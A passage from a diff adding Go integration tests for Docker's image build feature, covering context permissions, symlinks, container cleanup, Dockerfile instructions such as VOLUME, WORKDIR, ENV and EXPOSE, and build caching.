+		if err = os.Chown(pathToDirectoryWithoutReadAccess, 0, 0); err != nil {
+			c.Fatalf("failed to chown directory to root: %s", err)
+		}
+		if err = os.Chmod(pathToDirectoryWithoutReadAccess, 0444); err != nil {
+			c.Fatalf("failed to chmod directory to 444: %s", err)
+		}
+		if err = os.Chmod(pathToFileInDirectoryWithoutReadAccess, 0700); err != nil {
+			c.Fatalf("failed to chmod file to 700: %s", err)
+		}
+
+		buildCmd := exec.Command("su", "unprivilegeduser", "-c", fmt.Sprintf("%s build -t %s .", dockerBinary, name))
+		buildCmd.Dir = ctx.Dir
+		out, _, err := runCommandWithOutput(buildCmd)
+		if err == nil {
+			c.Fatalf("build should have failed: %s %s", err, out)
+		}
+
+		// check if we've detected the failure before we started building
+		if !strings.Contains(out, "can't stat") {
+			c.Fatalf("output should've contained the string: can't access %s", out)
+		}
+
+		if !strings.Contains(out, "Error checking context") {
+			c.Fatalf("output should've contained the string: Error checking context\ngot:%s", out)
+		}
+
+	}
+	{
+		name := "testlinksok"
+		ctx, err := fakeContext("FROM scratch\nADD . /foo/", nil)
+		if err != nil {
+			c.Fatal(err)
+		}
+		defer ctx.Close()
+
+		target := "../../../../../../../../../../../../../../../../../../../azA"
+		if err := os.Symlink(filepath.Join(ctx.Dir, "g"), target); err != nil {
+			c.Fatal(err)
+		}
+		defer os.Remove(target)
+		// This is used to ensure we don't follow links when checking if everything in the context is accessible
+		// This test doesn't require that we run commands as an unprivileged user
+		if _, err := buildImageFromContext(name, ctx, true); err != nil {
+			c.Fatal(err)
+		}
+	}
+	{
+		name := "testbuildignoredinaccessible"
+		ctx, err := fakeContext("FROM scratch\nADD . /foo/",
+			map[string]string{
+				"directoryWeCantStat/bar": "foo",
+				".dockerignore":           "directoryWeCantStat",
+			})
+		if err != nil {
+			c.Fatal(err)
+		}
+		defer ctx.Close()
+		// This is used to ensure we don't try to add inaccessible files when they are ignored by a .dockerignore pattern
+		pathToDirectoryWithoutReadAccess := filepath.Join(ctx.Dir, "directoryWeCantStat")
+		pathToFileInDirectoryWithoutReadAccess := filepath.Join(pathToDirectoryWithoutReadAccess, "bar")
+		if err = os.Chown(pathToDirectoryWithoutReadAccess, 0, 0); err != nil {
+			c.Fatalf("failed to chown directory to root: %s", err)
+		}
+		if err = os.Chmod(pathToDirectoryWithoutReadAccess, 0444); err != nil {
+			c.Fatalf("failed to chmod directory to 444: %s", err)
+		}
+		if err = os.Chmod(pathToFileInDirectoryWithoutReadAccess, 0700); err != nil {
+			c.Fatalf("failed to chmod file to 700: %s", err)
+		}
+
+		result := icmd.RunCmd(icmd.Cmd{
+			Dir: ctx.Dir,
+			Command: []string{"su", "unprivilegeduser", "-c",
+				fmt.Sprintf("%s build -t %s .", dockerBinary, name)},
+		})
+		result.Assert(c, icmd.Expected{})
+	}
+}
+
+func (s *DockerSuite) TestBuildForceRm(c *check.C) {
+	containerCountBefore, err := getContainerCount()
+	if err != nil {
+		c.Fatalf("failed to get the container count: %s", err)
+	}
+	name := "testbuildforcerm"
+
+	ctx, err := fakeContext(`FROM `+minimalBaseImage()+`
+	RUN true
+	RUN thiswillfail`, nil)
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	dockerCmdInDir(c, ctx.Dir, "build", "-t", name, "--force-rm", ".")
+
+	containerCountAfter, err := getContainerCount()
+	if err != nil {
+		c.Fatalf("failed to get the container count: %s", err)
+	}
+
+	if containerCountBefore != containerCountAfter {
+		c.Fatalf("--force-rm shouldn't have left containers behind")
+	}
+
+}
+
+func (s *DockerSuite) TestBuildRm(c *check.C) {
+	name := "testbuildrm"
+
+	ctx, err := fakeContext(`FROM `+minimalBaseImage()+`
+	ADD foo /
+	ADD foo /`, map[string]string{"foo": "bar"})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+	{
+		containerCountBefore, err := getContainerCount()
+		if err != nil {
+			c.Fatalf("failed to get the container count: %s", err)
+		}
+
+		out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "--rm", "-t", name, ".")
+
+		if err != nil {
+			c.Fatal("failed to build the image", out)
+		}
+
+		containerCountAfter, err := getContainerCount()
+		if err != nil {
+			c.Fatalf("failed to get the container count: %s", err)
+		}
+
+		if containerCountBefore != containerCountAfter {
+			c.Fatalf("-rm shouldn't have left containers behind")
+		}
+		deleteImages(name)
+	}
+
+	{
+		containerCountBefore, err := getContainerCount()
+		if err != nil {
+			c.Fatalf("failed to get the container count: %s", err)
+		}
+
+		out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "-t", name, ".")
+
+		if err != nil {
+			c.Fatal("failed to build the image", out)
+		}
+
+		containerCountAfter, err := getContainerCount()
+		if err != nil {
+			c.Fatalf("failed to get the container count: %s", err)
+		}
+
+		if containerCountBefore != containerCountAfter {
+			c.Fatalf("--rm shouldn't have left containers behind")
+		}
+		deleteImages(name)
+	}
+
+	{
+		containerCountBefore, err := getContainerCount()
+		if err != nil {
+			c.Fatalf("failed to get the container count: %s", err)
+		}
+
+		out, _, err := dockerCmdInDir(c, ctx.Dir, "build", "--rm=false", "-t", name, ".")
+
+		if err != nil {
+			c.Fatal("failed to build the image", out)
+		}
+
+		containerCountAfter, err := getContainerCount()
+		if err != nil {
+			c.Fatalf("failed to get the container count: %s", err)
+		}
+
+		if containerCountBefore == containerCountAfter {
+			c.Fatalf("--rm=false should have left containers behind")
+		}
+		deleteImages(name)
+
+	}
+
+}
+
+func (s *DockerSuite) TestBuildWithVolumes(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Invalid volume paths on Windows
+	var (
+		result   map[string]map[string]struct{}
+		name     = "testbuildvolumes"
+		emptyMap = make(map[string]struct{})
+		expected = map[string]map[string]struct{}{
+			"/test1":  emptyMap,
+			"/test2":  emptyMap,
+			"/test3":  emptyMap,
+			"/test4":  emptyMap,
+			"/test5":  emptyMap,
+			"/test6":  emptyMap,
+			"[/test7": emptyMap,
+			"/test8]": emptyMap,
+		}
+	)
+	_, err := buildImage(name,
+		`FROM scratch
+		VOLUME /test1
+		VOLUME /test2
+    VOLUME /test3 /test4
+    VOLUME ["/test5", "/test6"]
+    VOLUME [/test7 /test8]
+    `,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	res := inspectFieldJSON(c, name, "Config.Volumes")
+
+	err = json.Unmarshal([]byte(res), &result)
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	equal := reflect.DeepEqual(&result, &expected)
+
+	if !equal {
+		c.Fatalf("Volumes %s, expected %s", result, expected)
+	}
+
+}
+
+func (s *DockerSuite) TestBuildMaintainer(c *check.C) {
+	name := "testbuildmaintainer"
+
+	expected := "dockerio"
+	_, err := buildImage(name,
+		`FROM `+minimalBaseImage()+`
+        MAINTAINER dockerio`,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	res := inspectField(c, name, "Author")
+	if res != expected {
+		c.Fatalf("Maintainer %s, expected %s", res, expected)
+	}
+}
+
+func (s *DockerSuite) TestBuildUser(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	name := "testbuilduser"
+	expected := "dockerio"
+	_, err := buildImage(name,
+		`FROM busybox
+		RUN echo 'dockerio:x:1001:1001::/bin:/bin/false' >> /etc/passwd
+		USER dockerio
+		RUN [ $(whoami) = 'dockerio' ]`,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	res := inspectField(c, name, "Config.User")
+	if res != expected {
+		c.Fatalf("User %s, expected %s", res, expected)
+	}
+}
+
+func (s *DockerSuite) TestBuildRelativeWorkdir(c *check.C) {
+	name := "testbuildrelativeworkdir"
+
+	var (
+		expected1     string
+		expected2     string
+		expected3     string
+		expected4     string
+		expectedFinal string
+	)
+
+	if daemonPlatform == "windows" {
+		expected1 = `C:/`
+		expected2 = `C:/test1`
+		expected3 = `C:/test2`
+		expected4 = `C:/test2/test3`
+		expectedFinal = `C:\test2\test3` // Note inspect is going to return Windows paths, as it's not in busybox
+	} else {
+		expected1 = `/`
+		expected2 = `/test1`
+		expected3 = `/test2`
+		expected4 = `/test2/test3`
+		expectedFinal = `/test2/test3`
+	}
+
+	_, err := buildImage(name,
+		`FROM busybox
+		RUN sh -c "[ "$PWD" = "`+expected1+`" ]"
+		WORKDIR test1
+		RUN sh -c "[ "$PWD" = "`+expected2+`" ]"
+		WORKDIR /test2
+		RUN sh -c "[ "$PWD" = "`+expected3+`" ]"
+		WORKDIR test3
+		RUN sh -c "[ "$PWD" = "`+expected4+`" ]"`,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	res := inspectField(c, name, "Config.WorkingDir")
+	if res != expectedFinal {
+		c.Fatalf("Workdir %s, expected %s", res, expectedFinal)
+	}
+}
+
+// #22181 Regression test. Single end-to-end test of using
+// Windows semantics. Most path handling verifications are in unit tests
+func (s *DockerSuite) TestBuildWindowsWorkdirProcessing(c *check.C) {
+	testRequires(c, DaemonIsWindows)
+	name := "testbuildwindowsworkdirprocessing"
+	_, err := buildImage(name,
+		`FROM busybox
+		WORKDIR C:\\foo
+		WORKDIR bar
+		RUN sh -c "[ "$PWD" = "C:/foo/bar" ]"
+		`,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+}
+
+// #22181 Regression test. Most paths handling verifications are in unit test.
+// One functional test for end-to-end
+func (s *DockerSuite) TestBuildWindowsAddCopyPathProcessing(c *check.C) {
+	testRequires(c, DaemonIsWindows)
+	name := "testbuildwindowsaddcopypathprocessing"
+	// TODO Windows (@jhowardmsft). Needs a follow-up PR to 22181 to
+	// support backslash such as .\\ being equivalent to ./ and c:\\ being
+	// equivalent to c:/. This is not currently (nor ever has been) supported
+	// by docker on the Windows platform.
+	dockerfile := `
+		FROM busybox
+			# No trailing slash on COPY/ADD
+			# Results in dir being changed to a file
+			WORKDIR /wc1
+			COPY wc1 c:/wc1
+			WORKDIR /wc2
+			ADD wc2 c:/wc2
+			WORKDIR c:/
+			RUN sh -c "[ $(cat c:/wc1/wc1) = 'hellowc1' ]"
+			RUN sh -c "[ $(cat c:/wc2/wc2) = 'worldwc2' ]"
+
+			# Trailing slash on COPY/ADD, Windows-style path.
+			WORKDIR /wd1
+			COPY wd1 c:/wd1/
+			WORKDIR /wd2
+			ADD wd2 c:/wd2/
+			RUN sh -c "[ $(cat c:/wd1/wd1) = 'hellowd1' ]"
+			RUN sh -c "[ $(cat c:/wd2/wd2) = 'worldwd2' ]"
+			`
+	ctx, err := fakeContext(dockerfile, map[string]string{
+		"wc1": "hellowc1",
+		"wc2": "worldwc2",
+		"wd1": "hellowd1",
+		"wd2": "worldwd2",
+	})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+	_, err = buildImageFromContext(name, ctx, false)
+	if err != nil {
+		c.Fatal(err)
+	}
+}
+
+func (s *DockerSuite) TestBuildWorkdirWithEnvVariables(c *check.C) {
+	name := "testbuildworkdirwithenvvariables"
+
+	var expected string
+	if daemonPlatform == "windows" {
+		expected = `C:\test1\test2`
+	} else {
+		expected = `/test1/test2`
+	}
+
+	_, err := buildImage(name,
+		`FROM busybox
+		ENV DIRPATH /test1
+		ENV SUBDIRNAME test2
+		WORKDIR $DIRPATH
+		WORKDIR $SUBDIRNAME/$MISSING_VAR`,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	res := inspectField(c, name, "Config.WorkingDir")
+	if res != expected {
+		c.Fatalf("Workdir %s, expected %s", res, expected)
+	}
+}
+
+func (s *DockerSuite) TestBuildRelativeCopy(c *check.C) {
+	// cat /test1/test2/foo gets permission denied for the user
+	testRequires(c, NotUserNamespace)
+
+	var expected string
+	if daemonPlatform == "windows" {
+		expected = `C:/test1/test2`
+	} else {
+		expected = `/test1/test2`
+	}
+
+	name := "testbuildrelativecopy"
+	dockerfile := `
+		FROM busybox
+			WORKDIR /test1
+			WORKDIR test2
+			RUN sh -c "[ "$PWD" = '` + expected + `' ]"
+			COPY foo ./
+			RUN sh -c "[ $(cat /test1/test2/foo) = 'hello' ]"
+			ADD foo ./bar/baz
+			RUN sh -c "[ $(cat /test1/test2/bar/baz) = 'hello' ]"
+			COPY foo ./bar/baz2
+			RUN sh -c "[ $(cat /test1/test2/bar/baz2) = 'hello' ]"
+			WORKDIR ..
+			COPY foo ./
+			RUN sh -c "[ $(cat /test1/foo) = 'hello' ]"
+			COPY foo /test3/
+			RUN sh -c "[ $(cat /test3/foo) = 'hello' ]"
+			WORKDIR /test4
+			COPY . .
+			RUN sh -c "[ $(cat /test4/foo) = 'hello' ]"
+			WORKDIR /test5/test6
+			COPY foo ../
+			RUN sh -c "[ $(cat /test5/foo) = 'hello' ]"
+			`
+	ctx, err := fakeContext(dockerfile, map[string]string{
+		"foo": "hello",
+	})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+	_, err = buildImageFromContext(name, ctx, false)
+	if err != nil {
+		c.Fatal(err)
+	}
+}
+
+func (s *DockerSuite) TestBuildBlankName(c *check.C) {
+	name := "testbuildblankname"
+	_, _, stderr, err := buildImageWithStdoutStderr(name,
+		`FROM busybox
+		ENV =`,
+		true)
+	if err == nil {
+		c.Fatal("Build was supposed to fail but didn't")
+	}
+	if !strings.Contains(stderr, "ENV names can not be blank") {
+		c.Fatalf("Missing error message, got: %s", stderr)
+	}
+
+	_, _, stderr, err = buildImageWithStdoutStderr(name,
+		`FROM busybox
+		LABEL =`,
+		true)
+	if err == nil {
+		c.Fatal("Build was supposed to fail but didn't")
+	}
+	if !strings.Contains(stderr, "LABEL names can not be blank") {
+		c.Fatalf("Missing error message, got: %s", stderr)
+	}
+
+	_, _, stderr, err = buildImageWithStdoutStderr(name,
+		`FROM busybox
+		ARG =foo`,
+		true)
+	if err == nil {
+		c.Fatal("Build was supposed to fail but didn't")
+	}
+	if !strings.Contains(stderr, "ARG names can not be blank") {
+		c.Fatalf("Missing error message, got: %s", stderr)
+	}
+}
+
+func (s *DockerSuite) TestBuildEnv(c *check.C) {
+	testRequires(c, DaemonIsLinux) // ENV expansion is different in Windows
+	name := "testbuildenv"
+	expected := "[PATH=/test:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin PORT=2375]"
+	_, err := buildImage(name,
+		`FROM busybox
+		ENV PATH /test:$PATH
+        ENV PORT 2375
+		RUN [ $(env | grep PORT) = 'PORT=2375' ]`,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	res := inspectField(c, name, "Config.Env")
+	if res != expected {
+		c.Fatalf("Env %s, expected %s", res, expected)
+	}
+}
+
+func (s *DockerSuite) TestBuildPATH(c *check.C) {
+	testRequires(c, DaemonIsLinux) // ENV expansion is different in Windows
+
+	defPath := "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
+
+	fn := func(dockerfile string, exp string) {
+		_, err := buildImage("testbldpath", dockerfile, true)
+		c.Assert(err, check.IsNil)
+
+		res := inspectField(c, "testbldpath", "Config.Env")
+
+		if res != exp {
+			c.Fatalf("Env %q, expected %q for dockerfile:%q", res, exp, dockerfile)
+		}
+	}
+
+	tests := []struct{ dockerfile, exp string }{
+		{"FROM scratch\nMAINTAINER me", "[PATH=" + defPath + "]"},
+		{"FROM busybox\nMAINTAINER me", "[PATH=" + defPath + "]"},
+		{"FROM scratch\nENV FOO=bar", "[PATH=" + defPath + " FOO=bar]"},
+		{"FROM busybox\nENV FOO=bar", "[PATH=" + defPath + " FOO=bar]"},
+		{"FROM scratch\nENV PATH=/test", "[PATH=/test]"},
+		{"FROM busybox\nENV PATH=/test", "[PATH=/test]"},
+		{"FROM scratch\nENV PATH=''", "[PATH=]"},
+		{"FROM busybox\nENV PATH=''", "[PATH=]"},
+	}
+
+	for _, test := range tests {
+		fn(test.dockerfile, test.exp)
+	}
+}
+
+func (s *DockerSuite) TestBuildContextCleanup(c *check.C) {
+	testRequires(c, SameHostDaemon)
+
+	name := "testbuildcontextcleanup"
+	entries, err := ioutil.ReadDir(filepath.Join(dockerBasePath, "tmp"))
+	if err != nil {
+		c.Fatalf("failed to list contents of tmp dir: %s", err)
+	}
+	_, err = buildImage(name,
+		`FROM `+minimalBaseImage()+`
+        ENTRYPOINT ["/bin/echo"]`,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	entriesFinal, err := ioutil.ReadDir(filepath.Join(dockerBasePath, "tmp"))
+	if err != nil {
+		c.Fatalf("failed to list contents of tmp dir: %s", err)
+	}
+	if err = compareDirectoryEntries(entries, entriesFinal); err != nil {
+		c.Fatalf("context should have been deleted, but wasn't")
+	}
+
+}
+
+func (s *DockerSuite) TestBuildContextCleanupFailedBuild(c *check.C) {
+	testRequires(c, SameHostDaemon)
+
+	name := "testbuildcontextcleanup"
+	entries, err := ioutil.ReadDir(filepath.Join(dockerBasePath, "tmp"))
+	if err != nil {
+		c.Fatalf("failed to list contents of tmp dir: %s", err)
+	}
+	_, err = buildImage(name,
+		`FROM `+minimalBaseImage()+`
+	RUN /non/existing/command`,
+		true)
+	if err == nil {
+		c.Fatalf("expected build to fail, but it didn't")
+	}
+	entriesFinal, err := ioutil.ReadDir(filepath.Join(dockerBasePath, "tmp"))
+	if err != nil {
+		c.Fatalf("failed to list contents of tmp dir: %s", err)
+	}
+	if err = compareDirectoryEntries(entries, entriesFinal); err != nil {
+		c.Fatalf("context should have been deleted, but wasn't")
+	}
+
+}
+
+func (s *DockerSuite) TestBuildCmd(c *check.C) {
+	name := "testbuildcmd"
+
+	expected := "[/bin/echo Hello World]"
+	_, err := buildImage(name,
+		`FROM `+minimalBaseImage()+`
+        CMD ["/bin/echo", "Hello World"]`,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	res := inspectField(c, name, "Config.Cmd")
+	if res != expected {
+		c.Fatalf("Cmd %s, expected %s", res, expected)
+	}
+}
+
+func (s *DockerSuite) TestBuildExpose(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Expose not implemented on Windows
+	name := "testbuildexpose"
+	expected := "map[2375/tcp:{}]"
+	_, err := buildImage(name,
+		`FROM scratch
+        EXPOSE 2375`,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	res := inspectField(c, name, "Config.ExposedPorts")
+	if res != expected {
+		c.Fatalf("Exposed ports %s, expected %s", res, expected)
+	}
+}
+
+func (s *DockerSuite) TestBuildExposeMorePorts(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Expose not implemented on Windows
+	// start building docker file with a large number of ports
+	portList := make([]string, 50)
+	line := make([]string, 100)
+	expectedPorts := make([]int, len(portList)*len(line))
+	for i := 0; i < len(portList); i++ {
+		for j := 0; j < len(line); j++ {
+			p := i*len(line) + j + 1
+			line[j] = strconv.Itoa(p)
+			expectedPorts[p-1] = p
+		}
+		if i == len(portList)-1 {
+			portList[i] = strings.Join(line, " ")
+		} else {
+			portList[i] = strings.Join(line, " ") + ` \`
+		}
+	}
+
+	dockerfile := `FROM scratch
+	EXPOSE {{range .}} {{.}}
+	{{end}}`
+	tmpl := template.Must(template.New("dockerfile").Parse(dockerfile))
+	buf := bytes.NewBuffer(nil)
+	tmpl.Execute(buf, portList)
+
+	name := "testbuildexpose"
+	_, err := buildImage(name, buf.String(), true)
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	// check if all the ports are saved inside Config.ExposedPorts
+	res := inspectFieldJSON(c, name, "Config.ExposedPorts")
+	var exposedPorts map[string]interface{}
+	if err := json.Unmarshal([]byte(res), &exposedPorts); err != nil {
+		c.Fatal(err)
+	}
+
+	for _, p := range expectedPorts {
+		ep := fmt.Sprintf("%d/tcp", p)
+		if _, ok := exposedPorts[ep]; !ok {
+			c.Errorf("Port(%s) is not exposed", ep)
+		} else {
+			delete(exposedPorts, ep)
+		}
+	}
+	if len(exposedPorts) != 0 {
+		c.Errorf("Unexpected extra exposed ports %v", exposedPorts)
+	}
+}
+
+func (s *DockerSuite) TestBuildExposeOrder(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Expose not implemented on Windows
+	buildID := func(name, exposed string) string {
+		_, err := buildImage(name, fmt.Sprintf(`FROM scratch
+		EXPOSE %s`, exposed), true)
+		if err != nil {
+			c.Fatal(err)
+		}
+		id := inspectField(c, name, "Id")
+		return id
+	}
+
+	id1 := buildID("testbuildexpose1", "80 2375")
+	id2 := buildID("testbuildexpose2", "2375 80")
+	if id1 != id2 {
+		c.Errorf("EXPOSE should invalidate the cache only when ports actually changed")
+	}
+}
+
+func (s *DockerSuite) TestBuildExposeUpperCaseProto(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Expose not implemented on Windows
+	name := "testbuildexposeuppercaseproto"
+	expected := "map[5678/udp:{}]"
+	_, err := buildImage(name,
+		`FROM scratch
+        EXPOSE 5678/UDP`,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	res := inspectField(c, name, "Config.ExposedPorts")
+	if res != expected {
+		c.Fatalf("Exposed ports %s, expected %s", res, expected)
+	}
+}
+
+func (s *DockerSuite) TestBuildEmptyEntrypointInheritance(c *check.C) {
+	name := "testbuildentrypointinheritance"
+	name2 := "testbuildentrypointinheritance2"
+
+	_, err := buildImage(name,
+		`FROM busybox
+        ENTRYPOINT ["/bin/echo"]`,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	res := inspectField(c, name, "Config.Entrypoint")
+
+	expected := "[/bin/echo]"
+	if res != expected {
+		c.Fatalf("Entrypoint %s, expected %s", res, expected)
+	}
+
+	_, err = buildImage(name2,
+		fmt.Sprintf(`FROM %s
+        ENTRYPOINT []`, name),
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	res = inspectField(c, name2, "Config.Entrypoint")
+
+	expected = "[]"
+
+	if res != expected {
+		c.Fatalf("Entrypoint %s, expected %s", res, expected)
+	}
+
+}
+
+func (s *DockerSuite) TestBuildEmptyEntrypoint(c *check.C) {
+	name := "testbuildentrypoint"
+	expected := "[]"
+
+	_, err := buildImage(name,
+		`FROM busybox
+        ENTRYPOINT []`,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	res := inspectField(c, name, "Config.Entrypoint")
+	if res != expected {
+		c.Fatalf("Entrypoint %s, expected %s", res, expected)
+	}
+
+}
+
+func (s *DockerSuite) TestBuildEntrypoint(c *check.C) {
+	name := "testbuildentrypoint"
+
+	expected := "[/bin/echo]"
+	_, err := buildImage(name,
+		`FROM `+minimalBaseImage()+`
+        ENTRYPOINT ["/bin/echo"]`,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	res := inspectField(c, name, "Config.Entrypoint")
+	if res != expected {
+		c.Fatalf("Entrypoint %s, expected %s", res, expected)
+	}
+
+}
+
+// #6445 ensure ONBUILD triggers aren't committed to grandchildren
+func (s *DockerSuite) TestBuildOnBuildLimitedInheritence(c *check.C) {
+	var (
+		out2, out3 string
+	)
+	{
+		name1 := "testonbuildtrigger1"
+		dockerfile1 := `
+		FROM busybox
+		RUN echo "GRANDPARENT"
+		ONBUILD RUN echo "ONBUILD PARENT"
+		`
+		ctx, err := fakeContext(dockerfile1, nil)
+		if err != nil {
+			c.Fatal(err)
+		}
+		defer ctx.Close()
+
+		out1, _, err := dockerCmdInDir(c, ctx.Dir, "build", "-t", name1, ".")
+		if err != nil {
+			c.Fatalf("build failed to complete: %s, %v", out1, err)
+		}
+	}
+	{
+		name2 := "testonbuildtrigger2"
+		dockerfile2 := `
+		FROM testonbuildtrigger1
+		`
+		ctx, err := fakeContext(dockerfile2, nil)
+		if err != nil {
+			c.Fatal(err)
+		}
+		defer ctx.Close()
+
+		out2, _, err = dockerCmdInDir(c, ctx.Dir, "build", "-t", name2, ".")
+		if err != nil {
+			c.Fatalf("build failed to complete: %s, %v", out2, err)
+		}
+	}
+	{
+		name3 := "testonbuildtrigger3"
+		dockerfile3 := `
+		FROM testonbuildtrigger2
+		`
+		ctx, err := fakeContext(dockerfile3, nil)
+		if err != nil {
+			c.Fatal(err)
+		}
+		defer ctx.Close()
+
+		out3, _, err = dockerCmdInDir(c, ctx.Dir, "build", "-t", name3, ".")
+		if err != nil {
+			c.Fatalf("build failed to complete: %s, %v", out3, err)
+		}
+
+	}
+
+	// ONBUILD should be run in second build.
+	if !strings.Contains(out2, "ONBUILD PARENT") {
+		c.Fatalf("ONBUILD instruction did not run in child of ONBUILD parent")
+	}
+
+	// ONBUILD should *not* be run in third build.
+	if strings.Contains(out3, "ONBUILD PARENT") {
+		c.Fatalf("ONBUILD instruction ran in grandchild of ONBUILD parent")
+	}
+
+}
+
+func (s *DockerSuite) TestBuildWithCache(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Expose not implemented on Windows
+	name := "testbuildwithcache"
+	id1, err := buildImage(name,
+		`FROM scratch
+		MAINTAINER dockerio
+		EXPOSE 5432
+        ENTRYPOINT ["/bin/echo"]`,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	id2, err := buildImage(name,
+		`FROM scratch
+		MAINTAINER dockerio
+		EXPOSE 5432
+        ENTRYPOINT ["/bin/echo"]`,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	if id1 != id2 {
+		c.Fatal("The cache should have been used but hasn't.")
+	}
+}
+
+func (s *DockerSuite) TestBuildWithoutCache(c *check.C) {
+	testRequires(c, DaemonIsLinux) // Expose not implemented on Windows
+	name := "testbuildwithoutcache"
+	name2 := "testbuildwithoutcache2"
+	id1, err := buildImage(name,
+		`FROM scratch
+		MAINTAINER dockerio
+		EXPOSE 5432
+        ENTRYPOINT ["/bin/echo"]`,
+		true)
+	if err != nil {
+		c.Fatal(err)
+	}
+
+	id2, err := buildImage(name2,
+		`FROM scratch
+		MAINTAINER dockerio
+		EXPOSE 5432
+        ENTRYPOINT ["/bin/echo"]`,
+		false)
+	if err != nil {
+		c.Fatal(err)
+	}
+	if id1 == id2 {
+		c.Fatal("The cache should have been invalided but hasn't.")
+	}
+}
+
+func (s *DockerSuite) TestBuildConditionalCache(c *check.C) {
+	name := "testbuildconditionalcache"
+
+	dockerfile := `
+		FROM busybox
+        ADD foo /tmp/`
+	ctx, err := fakeContext(dockerfile, map[string]string{
+		"foo": "hello",
+	})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+
+	id1, err := buildImageFromContext(name, ctx, true)
+	if err != nil {
+		c.Fatalf("Error building #1: %s", err)
+	}
+
+	if err := ctx.Add("foo", "bye"); err != nil {
+		c.Fatalf("Error modifying foo: %s", err)
+	}
+
+	id2, err := buildImageFromContext(name, ctx, false)
+	if err != nil {
+		c.Fatalf("Error building #2: %s", err)
+	}
+	if id2 == id1 {
+		c.Fatal("Should not have used the cache")
+	}
+
+	id3, err := buildImageFromContext(name, ctx, true)
+	if err != nil {
+		c.Fatalf("Error building #3: %s", err)
+	}
+	if id3 != id2 {
+		c.Fatal("Should have used the cache")
+	}
+}
+
+func (s *DockerSuite) TestBuildAddLocalFileWithCache(c *check.C) {
+	// local files are not owned by the correct user
+	testRequires(c, NotUserNamespace)
+	name := "testbuildaddlocalfilewithcache"
+	name2 := "testbuildaddlocalfilewithcache2"
+	dockerfile := `
+		FROM busybox
+        MAINTAINER dockerio
+        ADD foo /usr/lib/bla/bar
+		RUN sh -c "[ $(cat /usr/lib/bla/bar) = "hello" ]"`
+	ctx, err := fakeContext(dockerfile, map[string]string{
+		"foo": "hello",
+	})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+	id1, err := buildImageFromContext(name, ctx, true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	id2, err := buildImageFromContext(name2, ctx, true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	if id1 != id2 {
+		c.Fatal("The cache should have been used but hasn't.")
+	}
+}
+
+func (s *DockerSuite) TestBuildAddMultipleLocalFileWithCache(c *check.C) {
+	name := "testbuildaddmultiplelocalfilewithcache"
+	name2 := "testbuildaddmultiplelocalfilewithcache2"
+	dockerfile := `
+		FROM busybox
+        MAINTAINER dockerio
+        ADD foo Dockerfile /usr/lib/bla/
+		RUN sh -c "[ $(cat /usr/lib/bla/foo) = "hello" ]"`
+	ctx, err := fakeContext(dockerfile, map[string]string{
+		"foo": "hello",
+	})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+	id1, err := buildImageFromContext(name, ctx, true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	id2, err := buildImageFromContext(name2, ctx, true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	if id1 != id2 {
+		c.Fatal("The cache should have been used but hasn't.")
+	}
+}
+
+func (s *DockerSuite) TestBuildAddLocalFileWithoutCache(c *check.C) {
+	// local files are not owned by the correct user
+	testRequires(c, NotUserNamespace)
+	name := "testbuildaddlocalfilewithoutcache"
+	name2 := "testbuildaddlocalfilewithoutcache2"
+	dockerfile := `
+		FROM busybox
+        MAINTAINER dockerio
+        ADD foo /usr/lib/bla/bar
+		RUN sh -c "[ $(cat /usr/lib/bla/bar) = "hello" ]"`
+	ctx, err := fakeContext(dockerfile, map[string]string{
+		"foo": "hello",
+	})
+	if err != nil {
+		c.Fatal(err)
+	}
+	defer ctx.Close()
+	id1, err := buildImageFromContext(name, ctx, true)
+	if err != nil {
+		c.Fatal(err)
+	}
+	id2, err := buildImageFromContext(name2, ctx, false)
+	if err != nil {
+		c.Fatal(err)
+	}
+	if id1 == id2 {
+		c.Fatal("The cache should have been invalided but hasn't.")
+	}
+}
+
+func (s *DockerSuite) TestBuildCopyDirButNotFile(c *check.C) {
+	name := "testbuildcopydirbutnotfile"
+	name2 := "testbuildcopydirbutnotfile2"
+
+	dockerfile := `
+        FROM ` + minimalBaseImage() + `
+        COPY dir /tmp/`
+	ctx, err := fakeContext(dockerfile, map[string]string{
+		"dir/foo": "hello",
+	})
+	if err != nil {
+		c.Fatal(err)
+	}
